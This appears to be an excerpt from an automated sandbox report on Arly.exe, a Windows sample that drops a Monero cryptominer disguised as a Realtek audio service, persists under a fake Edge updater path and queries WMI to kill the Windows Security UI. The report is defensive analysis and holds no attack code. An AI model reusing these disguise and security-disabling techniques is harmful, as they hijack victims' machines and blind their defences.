                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_stat_time_values)
                              Source: Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.20.2/node-v16.20.2-headers.tar.gz
                              Source: Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.20.2/node-v16.20.2.tar.gz
                              Source: Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/download/release/v16.20.2/win-x86/node.lib
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html).
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://sourcemaps.info/spec.html
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://stackoverflow.com/a/5501711/3561
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-%typedarray%-intrinsic-object
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-%typedarray%.of
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2397#section-2
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.2.2
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc6455#section-1.3
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.2
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.6
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.2.5
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#cannot-have-a-username-password-port
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://url.spec.whatwg.org/#special-scheme
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#url-serializing
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://v8.dev/blog/v8-release-89
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/resource-timing/#dfn-mark-resource-timing
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/resource-timing/#dfn-setup-the-resource-timing-entry
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#the-integrity-attribute
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-line-terminators
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-timeclip
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Alternative
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Atom
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClass
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClassEscape
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtom
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDash
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRanges
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlEscape
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlLetter
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalDigits
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalEscape
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Disjunction
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Hex4Digits
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigit
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigits
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexEscapeSequence
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRanges
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesNoDash
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-OctalDigit
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Pattern
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-PatternCharacter
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Quantifier
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-QuantifierPrefix
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-RegExpUnicodeEscapeSequence
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-SyntaxCharacter
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Assertion
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-AtomEscape
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-CharacterEscape
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassControlLetter
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassEscape
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedAtom
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedPatternCharacter
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-IdentityEscape
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-InvalidBracedQuantifier
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-LegacyOctalEscapeSequence
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Term
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-atomescape
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-term
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.iana.org/assignments/tls-extensiontype-values
                              Source: Arly.exe, 00000000.00000000.1266638136.00000000013A6000.00000002.00000001.01000000.00000003.sdmp, Arly.exe, 00000000.00000003.1272678785.0000000009DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                              Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49723 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49725 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49726 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49727 version: TLS 1.2
                              Source: Yara matchFile source: 61.3.svchost.exe.5060000.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 33.3.vwytuyiwrmnucib.exe.2d70000.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 33.3.vwytuyiwrmnucib.exe.2f90000.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 61.3.svchost.exe.4e40000.6.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 61.3.svchost.exe.4e40000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 61.3.svchost.exe.4e40000.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000003D.00000003.1943513880.0000000004E40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000021.00000003.1925993831.0000000002F90000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000003D.00000003.1943737923.0000000005060000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000021.00000003.1925632978.0000000002D70000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY

                              System Summary

                              barindex
                              Source: dump.pcap, type: PCAPMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                              Source: 67.0.RtkAudUService64a.exe.7ff6ce520000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                              Source: 67.0.RtkAudUService64a.exe.7ff6ce520000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                              Source: 67.0.RtkAudUService64a.exe.7ff6ce520000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                              Source: 00000043.00000000.2056256661.00007FF6CE8A4000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                              Source: vwytuyiwrmnucib.exe.0.drStatic PE information: section name:
                              Source: vwytuyiwrmnucib.exe.0.drStatic PE information: section name:
                              Source: vwytuyiwrmnucib.exe.0.drStatic PE information: section name:
                              Source: vwytuyiwrmnucib.exe.0.drStatic PE information: section name:
                              Source: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exeProcess Stats: CPU usage > 49%
                              Source: C:\Windows\System32\fontdrvhost.exeCode function: 62_2_0000023364730AC8 NtAcceptConnectPort,NtAcceptConnectPort,62_2_0000023364730AC8
                              Source: C:\Windows\System32\fontdrvhost.exeCode function: 62_2_0000023364731CF4 NtAcceptConnectPort,CloseHandle,62_2_0000023364731CF4
                              Source: C:\Windows\System32\fontdrvhost.exeCode function: 62_2_00000233647315C0 NtAcceptConnectPort,62_2_00000233647315C0
                              Source: C:\Windows\System32\fontdrvhost.exeCode function: 62_2_0000023364731AA4 NtAcceptConnectPort,NtAcceptConnectPort,62_2_0000023364731AA4
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeCode function: 34_2_00007FFC3D0804F234_2_00007FFC3D0804F2
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FFC3D07820240_2_00007FFC3D078202
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FFC3D07745640_2_00007FFC3D077456
                              Source: C:\Windows\System32\fontdrvhost.exeCode function: 62_2_0000023364730C7062_2_0000023364730C70
                              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 480 -p 2132 -ip 2132
                              Source: Arly.exe, 00000000.00000000.1270623261.0000000003E6D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameaethersuite.exe8 vs Arly.exe
                              Source: Arly.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: dump.pcap, type: PCAPMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                              Source: 67.0.RtkAudUService64a.exe.7ff6ce520000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                              Source: 67.0.RtkAudUService64a.exe.7ff6ce520000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                              Source: 67.0.RtkAudUService64a.exe.7ff6ce520000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                              Source: 00000043.00000000.2056256661.00007FF6CE8A4000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                              Source: vwytuyiwrmnucib.exe.0.drStatic PE information: Section: ZLIB complexity 0.9992485687022901
                              Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@102/40@4/7
                              Source: C:\Users\user\Desktop\Arly.exeFile created: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeJump to behavior
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4812:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4212:120:WilError_03
                              Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:2552:120:WilError_03
                              Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-3c38a179-f6bc-5041a1-d616db5b5627}
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeMutant created: \Sessions\1\BaseNamedObjects\GlobalSyncObj999
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5048:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7716:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_03
                              Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2132
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5032:120:WilError_03
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:64:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1492:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1424:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4928:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3172:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
                              Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeMutant created: \Sessions\1\BaseNamedObjects\1WIN
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5176:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1624:120:WilError_03
                              Source: C:\Users\user\Desktop\Arly.exeFile created: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeJump to behavior
                              Source: Arly.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                              Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SecHealthUI.exe")
                              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                              Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
